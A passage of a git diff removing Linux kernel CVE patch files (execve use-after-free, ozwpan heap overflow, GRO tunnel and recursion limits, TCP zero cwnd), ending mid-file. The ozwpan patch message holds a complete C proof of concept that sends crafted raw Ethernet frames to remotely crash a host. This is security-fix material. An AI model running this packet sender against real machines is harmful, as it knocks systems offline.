-RnJvbSBiZTE0MjFlN2Y1OTQ4ZjdjOWY3ZmYzNTFlYzQ3YzE5ZGE3NDk4Njg2IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBBbmRyZWEgQXJjYW5nZWxpIDxhbmRyZWFAY3B1c2hhcmUuY29tPgpEYXRlOiBUdWUsIDI1IEp1bCAyMDE3IDIyOjIyOjQ1ICswMjAwClN1YmplY3Q6IFtQQVRDSF0gZnMvZXhlYzogZml4IHVzZSBhZnRlciBmcmVlIGluIGV4ZWN2ZQoKImZpbGUiIGNhbiBiZSBhbHJlYWR5IGZyZWVkIGlmIGJwcm0tPmZpbGUgaXMgTlVMTCBhZnRlcgpzZWFyY2hfYmluYXJ5X2hhbmRsZXIoKSByZXR1cm4uIGJpbmZtdF9zY3JpcHQgd2lsbCBkbyBleGFjdGx5IHRoYXQgZm9yCmV4YW1wbGUuIElmIHRoZSBWTSByZXVzZXMgdGhlIGZpbGUgYWZ0ZXIgZnB1dCBydW4oKSwgdGhpcyB3aWxsIHJlc3VsdCBpbgphIHVzZSBhdGVyIGZyZWUuCgpTbyBvYnRhaW4gZF9pc19zdSBiZWZvcmUgc2VhcmNoX2JpbmFyeV9oYW5kbGVyKCkgcnVucy4KClRoaXMgc2hvdWxkIGV4cGxhaW4gdGhpcyBjcmFzaDoKClsyNTMzMy4wMDk1NTRdIFVuYWJsZSB0byBoYW5kbGUga2VybmVsIE5VTEwgcG9pbnRlciBkZXJlZmVyZW5jZSBhdCB2aXJ0dWFsIGFkZHJlc3MgMDAwMDAxODUKWy4uXQpbMjUzMzMuMDA5OTE4XSBbMjogICAgICAgICAgICAgYW06MjE4NjFdIFBDIGlzIGF0IGRvX2V4ZWN2ZSsweDM1NC8weDQ3NAoKQ2hhbmdlLUlkOiBJMmE4YTgxNGQxYzBhYTc1NjI1YmU4M2NiMzA0MzJjZjEzZjFhMDY4MQpTaWduZWQtb2ZmLWJ5OiBLZXZpbiBGLiBIYWdnZXJ0eSA8aGFnZ2VydGtAbGluZWFnZW9zLm9yZz4KLS0tCgpkaWZmIC0tZ2l0IGEvZnMvZXhlYy5jIGIvZnMvZXhlYy5jCmluZGV4IDczZTliZDQuLjVkMmEyZjAgMTAwNjQ0Ci0tLSBhL2ZzL2V4ZWMuYworKysgYi9mcy9leGVjLmMKQEAgLTE1MTEsNiArMTUxMSw3IEBACiAJYm9vbCBjbGVhcl9pbl9leGVjOwogCWludCByZXR2YWw7CiAJY29uc3Qgc3RydWN0IGNyZWQgKmNyZWQgPSBjdXJyZW50X2NyZWQoKTsKKwlib29sIGlzX3N1OwogCiAJLyoKIAkgKiBXZSBtb3ZlIHRoZSBhY3R1YWwgZmFpbHVyZSBpbiBjYXNlIG9mIFJMSU1JVF9OUFJPQyBleGNlc3MgZnJvbQpAQCAtMTU4NywxMSArMTU4OCwxNCBAQAogCWlmIChyZXR2YWwgPCAwKQogCQlnb3RvIG91dDsKIAorCS8qIHNlYXJjaF9iaW5hcnlfaGFuZGxlciBjYW4gcmVsZWFzZSBmaWxlIGFuZCBpdCBtYXkgYmUgZnJlZWQgKi8KKwlpc19zdSA9IGRfaXNfc3UoZmlsZS0+Zl9kZW50cnkpOworCiAJcmV0dmFsID0gc2VhcmNoX2JpbmFyeV9oYW5kbGVyKGJwcm0scmVncyk7CiAJaWYgKHJldHZhbCA8IDApCiAJCWdvdG8gb3V0OwogCi0JaWYgKGRfaXNfc3UoZmlsZS0+Zl9kZW50cnkpICYmIGNhcGFibGUoQ0FQX1NZU19BRE1JTikpIHsKKwlpZiAoaXNfc3UgJiYgY2FwYWJsZShDQVBfU1lTX0FETUlOKSkgewogCQljdXJyZW50LT5mbGFncyB8PSBQRl9TVTsKIAkJc3VfZXhlYygpOwogCX0K
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/Untracked/ANY/0002-ozwpan-Use-unsigned-ints-to-prevent-heap-overflow.patch b/Patches/Linux_CVEs/Untracked/ANY/0002-ozwpan-Use-unsigned-ints-to-prevent-heap-overflow.patch
deleted file mode 100644
index ddffcaeb..00000000
--- a/Patches/Linux_CVEs/Untracked/ANY/0002-ozwpan-Use-unsigned-ints-to-prevent-heap-overflow.patch
+++ /dev/null
@@ -1,220 +0,0 @@
-From 39a4e1c2675ab45cec548a99ad770faa769ee27a Mon Sep 17 00:00:00 2001
-From: "Jason A. Donenfeld" <Jason@zx2c4.com>
-Date: Mon, 29 May 2017 12:36:54 +0530
-Subject: ozwpan: Use unsigned ints to prevent heap overflow
-
-[ Upstream commit: b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c ]
-
-Using signed integers, the subtraction between required_size and offset
-could wind up being negative, resulting in a memcpy into a heap buffer
-with a negative length, resulting in huge amounts of network-supplied
-data being copied into the heap, which could potentially lead to remote
-code execution.. This is remotely triggerable with a magic packet.
-A PoC which obtains DoS follows below. It requires the ozprotocol.h file
-from this module.
-
-=-=-=-=-=-=
-
-static int hex2num(char c)
-{
-        if (c >= '0' && c <= '9')
-                return c - '0';
-        if (c >= 'a' && c <= 'f')
-                return c - 'a' + 10;
-        if (c >= 'A' && c <= 'F')
-                return c - 'A' + 10;
-        return -1;
-}
-static int hwaddr_aton(const char *txt, uint8_t *addr)
-{
-        int i;
-        for (i = 0; i < 6; i++) {
-                int a, b;
-                a = hex2num(*txt++);
-                if (a < 0)
-                        return -1;
-                b = hex2num(*txt++);
-                if (b < 0)
-                        return -1;
-                *addr++ = (a << 4) | b;
-                if (i < 5 && *txt++ != ':')
-                        return -1;
-        }
-        return 0;
-}
-
-int main(int argc, char *argv[])
-{
-        if (argc < 3) {
-                fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
-                return 1;
-        }
-
-        uint8_t dest_mac[6];
-        if (hwaddr_aton(argv[2], dest_mac)) {
-                fprintf(stderr, "Invalid mac address.\n");
-                return 1;
-        }
-
-        int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
-        if (sockfd < 0) {
-                perror("socket");
-                return 1;
-        }
-
-        struct ifreq if_idx;
-        int interface_index;
-        strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
-        if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
-                perror("SIOCGIFINDEX");
-                return 1;
-        }
-        interface_index = if_idx.ifr_ifindex;
-        if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
-                perror("SIOCGIFHWADDR");
-                return 1;
-        }
-        uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
-
-        struct {
-                struct ether_header ether_header;
-                struct oz_hdr oz_hdr;
-                struct oz_elt oz_elt;
-                struct oz_elt_connect_req oz_elt_connect_req;
-        } __packed connect_packet = {
-                .ether_header = {
-                        .ether_type = htons(OZ_ETHERTYPE),
-                        .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
-                        .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
-                },
-                .oz_hdr = {
-                        .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
-                        .last_pkt_num = 0,
-                        .pkt_num = htole32(0)
-                },
-                .oz_elt = {
-                        .type = OZ_ELT_CONNECT_REQ,
-                        .length = sizeof(struct oz_elt_connect_req)
-                },
-                .oz_elt_connect_req = {
-                        .mode = 0,
-                        .resv1 = {0},
-                        .pd_info = 0,
-                        .session_id = 0,
-                        .presleep = 35,
-                        .ms_isoc_latency = 0,
-                        .host_vendor = 0,
-                        .keep_alive = 0,
-                        .apps = htole16((1 << OZ_APPID_USB) | 0x1),
-                        .max_len_div16 = 0,
-                        .ms_per_isoc = 0,
-                        .up_audio_buf = 0,
-                        .ms_per_elt = 0
-                }
-        };
-
-        struct {
-                struct ether_header ether_header;
-                struct oz_hdr oz_hdr;
-                struct oz_elt oz_elt;
-                struct oz_get_desc_rsp oz_get_desc_rsp;
-        } __packed pwn_packet = {
-                .ether_header = {
-                        .ether_type = htons(OZ_ETHERTYPE),
-                        .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
-                        .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
-                },
-                .oz_hdr = {
-                        .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
-                        .last_pkt_num = 0,
-                        .pkt_num = htole32(1)
-                },
-                .oz_elt = {
-                        .type = OZ_ELT_APP_DATA,
-                        .length = sizeof(struct oz_get_desc_rsp)
-                },
-                .oz_get_desc_rsp = {
-                        .app_id = OZ_APPID_USB,
-                        .elt_seq_num = 0,
-                        .type = OZ_GET_DESC_RSP,
-                        .req_id = 0,
-                        .offset = htole16(2),
-                        .total_size = htole16(1),
-                        .rcode = 0,
-                        .data = {0}
-                }
-        };
-
-        struct sockaddr_ll socket_address = {
-                .sll_ifindex = interface_index,
-                .sll_halen = ETH_ALEN,
-                .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
-        };
-
-        if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
-                perror("sendto");
-                return 1;
-        }
-        usleep(300000);
-        if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
-                perror("sendto");
-                return 1;
-        }
-        return 0;
-}
-
-Change-Id: Ibc1a8b7baa06332b2a7fe7135c68faee1bd791d9
-Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
-Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Signed-off-by: Akshaya <akshayab@codeaurora.org>
----
- drivers/staging/ozwpan/ozhcd.c   | 8 ++++----
- drivers/staging/ozwpan/ozusbif.h | 4 ++--
- 2 files changed, 6 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/staging/ozwpan/ozhcd.c b/drivers/staging/ozwpan/ozhcd.c
-index e880452..628e4e2 100644
---- a/drivers/staging/ozwpan/ozhcd.c
-+++ b/drivers/staging/ozwpan/ozhcd.c
-@@ -746,8 +746,8 @@ void oz_hcd_pd_reset(void *hpd, void *hport)
- /*
-  * Context: softirq
-  */
--void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc,
--			int length, int offset, int total_size)
-+void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, const u8 *desc,
-+			u8 length, u16 offset, u16 total_size)
- {
- 	struct oz_port *port = (struct oz_port *)hport;
- 	struct urb *urb;
-@@ -759,8 +759,8 @@ void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc,
- 	if (!urb)
- 		return;
- 	if (status == 0) {
--		int copy_len;
--		int required_size = urb->transfer_buffer_length;
-+		unsigned int copy_len;
-+		unsigned int required_size = urb->transfer_buffer_length;
- 
- 		if (required_size > total_size)
- 			required_size = total_size;
-diff --git a/drivers/staging/ozwpan/ozusbif.h b/drivers/staging/ozwpan/ozusbif.h
-index 4249fa3..d2a6085 100644
---- a/drivers/staging/ozwpan/ozusbif.h
-+++ b/drivers/staging/ozwpan/ozusbif.h
-@@ -29,8 +29,8 @@ void oz_usb_request_heartbeat(void *hpd);
- 
- /* Confirmation functions.
-  */
--void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status,
--	const u8 *desc, int length, int offset, int total_size);
-+void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status,
-+	const u8 *desc, u8 length, u16 offset, u16 total_size);
- void oz_hcd_control_cnf(void *hport, u8 req_id, u8 rcode,
- 	const u8 *data, int data_len);
- 
--- 
-1.9.1
-
diff --git a/Patches/Linux_CVEs/Untracked/ANY/0003-tunnels-Don-t-apply-GRO-to-multiple-layers-of-encaps.patch b/Patches/Linux_CVEs/Untracked/ANY/0003-tunnels-Don-t-apply-GRO-to-multiple-layers-of-encaps.patch
deleted file mode 100644
index 413847c5..00000000
--- a/Patches/Linux_CVEs/Untracked/ANY/0003-tunnels-Don-t-apply-GRO-to-multiple-layers-of-encaps.patch
+++ /dev/null
@@ -1,169 +0,0 @@
-From ce7dbf611ba9db087abc984ba1807771fb0c3545 Mon Sep 17 00:00:00 2001
-From: Jesse Gross <jesse@kernel.org>
-Date: Fri, 26 May 2017 10:43:25 +0530
-Subject: tunnels: Don't apply GRO to multiple layers of encapsulation.
-
-[ Upstream commit: fac8e0f579695a3ecbc4d3cac369139d7f819971]
-
-When drivers express support for TSO of encapsulated packets, they
-only mean that they can do it for one layer of encapsulation.
-Supporting additional levels would mean updating, at a minimum,
-more IP length fields and they are unaware of this.
-
-No encapsulation device expresses support for handling offloaded
-encapsulated packets, so we won't generate these types of frames
-in the transmit path. However, GRO doesn't have a check for
-multiple levels of encapsulation and will attempt to build them.
-
-UDP tunnel GRO actually does prevent this situation but it only
-handles multiple UDP tunnels stacked on top of each other. This
-generalizes that solution to prevent any kind of tunnel stacking
-that would cause problems.
-
-Change-Id: I072ec2fec752795bee66cf5464af48f17c837a7f
-Signed-off-by: Jesse Gross <jesse@kernel.org>
-Signed-off-by: Akshaya <akshayab@codeaurora.org>
----
- include/linux/netdevice.h |  4 ++--
- net/core/dev.c            |  2 +-
- net/ipv4/af_inet.c        | 15 ++++++++++++++-
- net/ipv4/gre_offload.c    |  5 +++++
- net/ipv4/udp_offload.c    |  6 +++---
- net/ipv6/ip6_offload.c    | 15 ++++++++++++++-
- 6 files changed, 39 insertions(+), 8 deletions(-)
-
-diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
-index 943a8301..173b250 100644
---- a/include/linux/netdevice.h
-+++ b/include/linux/netdevice.h
-@@ -1902,8 +1902,8 @@ struct napi_gro_cb {
- 	/* Used in ipv6_gro_receive() and foo-over-udp */
- 	u16	proto;
- 
--	/* Used in udp_gro_receive */
--	u8	udp_mark:1;
-+	/* Used in tunnel GRO receive */
-+	u8	encap_mark:1;
- 
- 	/* GRO checksum is valid */
- 	u8	csum_valid:1;
-diff --git a/net/core/dev.c b/net/core/dev.c
-index 9d41179..99e2387 100644
---- a/net/core/dev.c
-+++ b/net/core/dev.c
-@@ -4116,7 +4116,7 @@ static enum gro_result dev_gro_receive(struct napi_struct *napi, struct sk_buff
- 		NAPI_GRO_CB(skb)->same_flow = 0;
- 		NAPI_GRO_CB(skb)->flush = 0;
- 		NAPI_GRO_CB(skb)->free = 0;
--		NAPI_GRO_CB(skb)->udp_mark = 0;
-+		NAPI_GRO_CB(skb)->encap_mark = 0;
- 
- 		/* Setup for GRO checksum validation */
- 		switch (skb->ip_summed) {
-diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
-index b39d5ef..5589a7c 100644
---- a/net/ipv4/af_inet.c
-+++ b/net/ipv4/af_inet.c
-@@ -1420,6 +1420,19 @@ out:
- 	return pp;
- }
- 
-+static struct sk_buff **ipip_gro_receive(struct sk_buff **head,
-+					 struct sk_buff *skb)
-+{
-+	if (NAPI_GRO_CB(skb)->encap_mark) {
-+		NAPI_GRO_CB(skb)->flush = 1;
-+		return NULL;
-+	}
-+
-+	NAPI_GRO_CB(skb)->encap_mark = 1;
-+
-+	return inet_gro_receive(head, skb);
-+}
-+
- int inet_recv_error(struct sock *sk, struct msghdr *msg, int len, int *addr_len)
- {
- 	if (sk->sk_family == AF_INET)
-@@ -1678,7 +1691,7 @@ static struct packet_offload ip_packet_offload __read_mostly = {
- static const struct net_offload ipip_offload = {
- 	.callbacks = {
- 		.gso_segment	= inet_gso_segment,
--		.gro_receive	= inet_gro_receive,
-+		.gro_receive	= ipip_gro_receive,
- 		.gro_complete	= inet_gro_complete,
- 	},
- };
-diff --git a/net/ipv4/gre_offload.c b/net/ipv4/gre_offload.c
-index abc50b4..cc7b082 100644
---- a/net/ipv4/gre_offload.c
-+++ b/net/ipv4/gre_offload.c
-@@ -128,6 +128,11 @@ static struct sk_buff **gre_gro_receive(struct sk_buff **head,
- 	struct packet_offload *ptype;
- 	__be16 type;
- 
-+	if (NAPI_GRO_CB(skb)->encap_mark)
-+		goto out;
-+
-+	NAPI_GRO_CB(skb)->encap_mark = 1;
-+
- 	off = skb_gro_offset(skb);
- 	hlen = off + sizeof(*greh);
- 	greh = skb_gro_header_fast(skb, off);
-diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
-index 6480cea..e6d05ae 100644
---- a/net/ipv4/udp_offload.c
-+++ b/net/ipv4/udp_offload.c
-@@ -266,14 +266,14 @@ struct sk_buff **udp_gro_receive(struct sk_buff **head, struct sk_buff *skb,
- 	unsigned int off = skb_gro_offset(skb);
- 	int flush = 1;
- 
--	if (NAPI_GRO_CB(skb)->udp_mark ||
-+	if (NAPI_GRO_CB(skb)->encap_mark ||
- 	    (skb->ip_summed != CHECKSUM_PARTIAL &&
- 	     NAPI_GRO_CB(skb)->csum_cnt == 0 &&
- 	     !NAPI_GRO_CB(skb)->csum_valid))
- 		goto out;
- 
--	/* mark that this skb passed once through the udp gro layer */
--	NAPI_GRO_CB(skb)->udp_mark = 1;
-+	/* mark that this skb passed once through the tunnel gro layer */
-+	NAPI_GRO_CB(skb)->encap_mark = 1;
- 
- 	rcu_read_lock();
- 	uo_priv = rcu_dereference(udp_offload_base);
-diff --git a/net/ipv6/ip6_offload.c b/net/ipv6/ip6_offload.c
-index dece5c7..dbc528e 100644
---- a/net/ipv6/ip6_offload.c
-+++ b/net/ipv6/ip6_offload.c
-@@ -255,6 +255,19 @@ out:
- 	return pp;
- }
- 
-+static struct sk_buff **sit_gro_receive(struct sk_buff **head,
-+					struct sk_buff *skb)
-+{
-+	if (NAPI_GRO_CB(skb)->encap_mark) {
-+		NAPI_GRO_CB(skb)->flush = 1;
-+		return NULL;
-+	}
-+
-+	NAPI_GRO_CB(skb)->encap_mark = 1;
-+
-+	return ipv6_gro_receive(head, skb);
-+}
-+
- static int ipv6_gro_complete(struct sk_buff *skb, int nhoff)
- {
- 	const struct net_offload *ops;
-@@ -289,7 +302,7 @@ static struct packet_offload ipv6_packet_offload __read_mostly = {
- static const struct net_offload sit_offload = {
- 	.callbacks = {
- 		.gso_segment	= ipv6_gso_segment,
--		.gro_receive	= ipv6_gro_receive,
-+		.gro_receive    = sit_gro_receive,
- 		.gro_complete	= ipv6_gro_complete,
- 	},
- };
--- 
-1.9.1
-
diff --git a/Patches/Linux_CVEs/Untracked/ANY/0004-net-add-recursion-limit-to-GRO.patch b/Patches/Linux_CVEs/Untracked/ANY/0004-net-add-recursion-limit-to-GRO.patch
deleted file mode 100644
index a0fb9e84..00000000
--- a/Patches/Linux_CVEs/Untracked/ANY/0004-net-add-recursion-limit-to-GRO.patch
+++ /dev/null
@@ -1,190 +0,0 @@
-From 8a069274d823319273dab097e865faa01bee2451 Mon Sep 17 00:00:00 2001
-From: Sabrina Dubroca <sd@queasysnail.net>
-Date: Fri, 26 May 2017 15:25:08 +0530
-Subject: net: add recursion limit to GRO
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-[ Backported upstream commit: fcd91dd449867c6bfe56a81cabba76b829fd05cd]
-[ Files without GRO support have not been updated ]
-
-Currently, GRO can do unlimited recursion through the gro_receive
-handlers.  This was fixed for tunneling protocols by limiting tunnel GRO
-to one level with encap_mark, but both VLAN and TEB still have this
-problem.  Thus, the kernel is vulnerable to a stack overflow, if we
-receive a packet composed entirely of VLAN headers.
-
-This patch adds a recursion counter to the GRO layer to prevent stack
-overflow.  When a gro_receive function hits the recursion limit, GRO is
-aborted for this skb and it is processed normally.  This recursion
-counter is put in the GRO CB, but could be turned into a percpu counter
-if we run out of space in the CB.
-
-Thanks to Vladimír Beneš <vbenes@redhat.com> for the initial bug report.
-
-Change-Id: Iec7b958d843c5d8214a36be8187d03f9e86ef079
-Fixes: CVE-2016-7039
-Fixes: 9b174d88c257 ("net: Add Transparent Ethernet Bridging GRO support.")
-Fixes: 66e5133f19e9 ("vlan: Add GRO support for non hardware accelerated vlan")
-Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
-Reviewed-by: Jiri Benc <jbenc@redhat.com>
-Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Acked-by: Tom Herbert <tom@herbertland.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-Signed-off-by: Akshaya <akshayab@codeaurora.org>
----
- drivers/net/vxlan.c       |  2 +-
- include/linux/netdevice.h | 24 ++++++++++++++++++++++++
- net/core/dev.c            |  1 +
- net/ipv4/af_inet.c        |  2 +-
- net/ipv4/fou.c            |  4 ++--
- net/ipv4/gre_offload.c    |  2 +-
- net/ipv4/udp_offload.c    |  2 +-
- net/ipv6/ip6_offload.c    |  2 +-
- 8 files changed, 32 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/net/vxlan.c b/drivers/net/vxlan.c
-index 59282dd..d7cdfad 100644
---- a/drivers/net/vxlan.c
-+++ b/drivers/net/vxlan.c
-@@ -600,7 +600,7 @@ static struct sk_buff **vxlan_gro_receive(struct sk_buff **head, struct sk_buff
- 
- 	skb_gro_pull(skb, sizeof(*eh)); /* pull inner eth header */
- 	skb_gro_postpull_rcsum(skb, eh, sizeof(*eh));
--	pp = ptype->callbacks.gro_receive(head, skb);
-+	pp = call_gro_receive(ptype->callbacks.gro_receive, head, skb);
- 
- out_unlock:
- 	rcu_read_unlock();
-diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
-index 173b250..cbcd056 100644
---- a/include/linux/netdevice.h
-+++ b/include/linux/netdevice.h
-@@ -1914,6 +1914,11 @@ struct napi_gro_cb {
- 	/* Used in foo-over-udp, set in udp[46]_gro_receive */
- 	u8	is_ipv6:1;
- 
-+	/* Number of gro_receive callbacks this packet already went through */
-+	u8 recursion_counter:4;
-+
-+	/* 1 bit hole */
-+
- 	/* used to support CHECKSUM_COMPLETE for tunneling protocols */
- 	__wsum	csum;
- 
-@@ -1923,6 +1928,25 @@ struct napi_gro_cb {
- 
- #define NAPI_GRO_CB(skb) ((struct napi_gro_cb *)(skb)->cb)
- 
-+#define GRO_RECURSION_LIMIT 15
-+static inline int gro_recursion_inc_test(struct sk_buff *skb)
-+{
-+	return ++NAPI_GRO_CB(skb)->recursion_counter == GRO_RECURSION_LIMIT;
-+}
-+
-+typedef struct sk_buff **(*gro_receive_t)(struct sk_buff **, struct sk_buff *);
-+static inline struct sk_buff **call_gro_receive(gro_receive_t cb,
-+						struct sk_buff **head,
-+						struct sk_buff *skb)
-+{
-+	if (unlikely(gro_recursion_inc_test(skb))) {
-+		NAPI_GRO_CB(skb)->flush |= 1;
-+		return NULL;
-+	}
-+
-+	return cb(head, skb);
-+}
-+
- struct packet_type {
- 	__be16			type;	/* This is really htons(ether_type). */
- 	struct net_device	*dev;	/* NULL is wildcarded here	     */
-diff --git a/net/core/dev.c b/net/core/dev.c
-index 99e2387..836e4f0 100644
---- a/net/core/dev.c
-+++ b/net/core/dev.c
-@@ -4117,6 +4117,7 @@ static enum gro_result dev_gro_receive(struct napi_struct *napi, struct sk_buff
- 		NAPI_GRO_CB(skb)->flush = 0;
- 		NAPI_GRO_CB(skb)->free = 0;
- 		NAPI_GRO_CB(skb)->encap_mark = 0;
-+		NAPI_GRO_CB(skb)->recursion_counter = 0;
- 
- 		/* Setup for GRO checksum validation */
- 		switch (skb->ip_summed) {
-diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
-index 5589a7c..4fc2ca4 100644
---- a/net/ipv4/af_inet.c
-+++ b/net/ipv4/af_inet.c
-@@ -1409,7 +1409,7 @@ static struct sk_buff **inet_gro_receive(struct sk_buff **head,
- 	skb_gro_pull(skb, sizeof(*iph));
- 	skb_set_transport_header(skb, skb_gro_offset(skb));
- 
--	pp = ops->callbacks.gro_receive(head, skb);
-+	pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
- 
- out_unlock:
- 	rcu_read_unlock();
-diff --git a/net/ipv4/fou.c b/net/ipv4/fou.c
-index 8ce8e82..7b5b280 100644
---- a/net/ipv4/fou.c
-+++ b/net/ipv4/fou.c
-@@ -119,7 +119,7 @@ static struct sk_buff **fou_gro_receive(struct sk_buff **head,
- 	if (!ops || !ops->callbacks.gro_receive)
- 		goto out_unlock;
- 
--	pp = ops->callbacks.gro_receive(head, skb);
-+	pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
- 
- out_unlock:
- 	rcu_read_unlock();
-@@ -220,7 +220,7 @@ static struct sk_buff **gue_gro_receive(struct sk_buff **head,
- 	/* Adjusted NAPI_GRO_CB(skb)->csum after skb_gro_pull()*/
- 	skb_gro_postpull_rcsum(skb, guehdr, guehlen);
- 
--	pp = ops->callbacks.gro_receive(head, skb);
-+	pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
- 
- out_unlock:
- 	rcu_read_unlock();
-diff --git a/net/ipv4/gre_offload.c b/net/ipv4/gre_offload.c
-index cc7b082..370c057 100644
---- a/net/ipv4/gre_offload.c
-+++ b/net/ipv4/gre_offload.c
-@@ -219,7 +219,7 @@ static struct sk_buff **gre_gro_receive(struct sk_buff **head,
- 	/* Adjusted NAPI_GRO_CB(skb)->csum after skb_gro_pull()*/
- 	skb_gro_postpull_rcsum(skb, greh, grehlen);
- 
--	pp = ptype->callbacks.gro_receive(head, skb);
-+	pp = call_gro_receive(ptype->callbacks.gro_receive, head, skb);
- 
- out_unlock:
- 	rcu_read_unlock();
-diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
-index e6d05ae..f805597 100644
---- a/net/ipv4/udp_offload.c
-+++ b/net/ipv4/udp_offload.c
-@@ -306,7 +306,7 @@ unflush:
- 	skb_gro_pull(skb, sizeof(struct udphdr)); /* pull encapsulating udp header */
- 	skb_gro_postpull_rcsum(skb, uh, sizeof(struct udphdr));
- 	NAPI_GRO_CB(skb)->proto = uo_priv->offload->ipproto;
--	pp = uo_priv->offload->callbacks.gro_receive(head, skb);
-+	pp = call_gro_receive(uo_priv->offload->callbacks.gro_receive, head, skb);
- 
- out_unlock:
- 	rcu_read_unlock();
-diff --git a/net/ipv6/ip6_offload.c b/net/ipv6/ip6_offload.c
-index dbc528e..b10c0c6 100644
---- a/net/ipv6/ip6_offload.c
-+++ b/net/ipv6/ip6_offload.c
-@@ -244,7 +244,7 @@ static struct sk_buff **ipv6_gro_receive(struct sk_buff **head,
- 
- 	skb_gro_postpull_rcsum(skb, iph, nlen);
- 
--	pp = ops->callbacks.gro_receive(head, skb);
-+	pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
- 
- out_unlock:
- 	rcu_read_unlock();
--- 
-1.9.1
-
diff --git a/Patches/Linux_CVEs/Untracked/ANY/0005-tcp-fix-zero-cwnd-in-tcp_cwnd_reduction.patch b/Patches/Linux_CVEs/Untracked/ANY/0005-tcp-fix-zero-cwnd-in-tcp_cwnd_reduction.patch
deleted file mode 100644
index 5843e1f5..00000000
--- a/Patches/Linux_CVEs/Untracked/ANY/0005-tcp-fix-zero-cwnd-in-tcp_cwnd_reduction.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From e1f31f3f20ab760ebb2425e67385b2c593c35be5 Mon Sep 17 00:00:00 2001
-From: Yuchung Cheng <ycheng@google.com>
-Date: Fri, 26 May 2017 15:45:15 +0530
-Subject: tcp: fix zero cwnd in tcp_cwnd_reduction
-
-[ Upstream commit: 8b8a321ff72c785ed5e8b4cf6eda20b35d427390]
-
-Patch 3759824da87b ("tcp: PRR uses CRB mode by default and SS mode
-conditionally") introduced a bug that cwnd may become 0 when both
-inflight and sndcnt are 0 (cwnd = inflight + sndcnt). This may lead
-to a div-by-zero if the connection starts another cwnd reduction
-phase by setting tp->prior_cwnd to the current cwnd (0) in
-tcp_init_cwnd_reduction().
-
-To prevent this we skip PRR operation when nothing is acked or
-sacked. Then cwnd must be positive in all cases as long as ssthresh
-is positive:
-
-1) The proportional reduction mode
-   inflight > ssthresh > 0
-
-2) The reduction bound mode
-   a) inflight == ssthresh > 0
-
-   b) inflight < ssthresh
-      sndcnt > 0 since newly_acked_sacked > 0 and inflight < ssthresh
-
-Therefore in all cases inflight and sndcnt can not both be 0.
-We check invalid tp->prior_cwnd to avoid potential div0 bugs.
-
-In reality this bug is triggered only with a sequence of less common
-events.  For example, the connection is terminating an ECN-triggered
-cwnd reduction with an inflight 0, then it receives reordered/old
-ACKs or DSACKs from prior transmission (which acks nothing). Or the
-connection is in fast recovery stage that marks everything lost,
-but fails to retransmit due to local issues, then receives data
-packets from other end which acks nothing.
-
-Change-Id: I6edbd82492839ca86515c64ee22828f7582900aa
-Fixes: 3759824da87b ("tcp: PRR uses CRB mode by default and SS mode conditionally")
-Reported-by: Oleksandr Natalenko <oleksandr@natalenko.name>
-Signed-off-by: Yuchung Cheng <ycheng@google.com>
-Signed-off-by: Neal Cardwell <ncardwell@google.com>
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-Signed-off-by: Akshaya <akshayab@codeaurora.org>
----
- net/ipv4/tcp_input.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
-index cc7f940..c0be23d 100644
---- a/net/ipv4/tcp_input.c
-+++ b/net/ipv4/tcp_input.c
-@@ -2516,6 +2516,9 @@ static void tcp_cwnd_reduction(struct sock *sk, const int prior_unsacked,
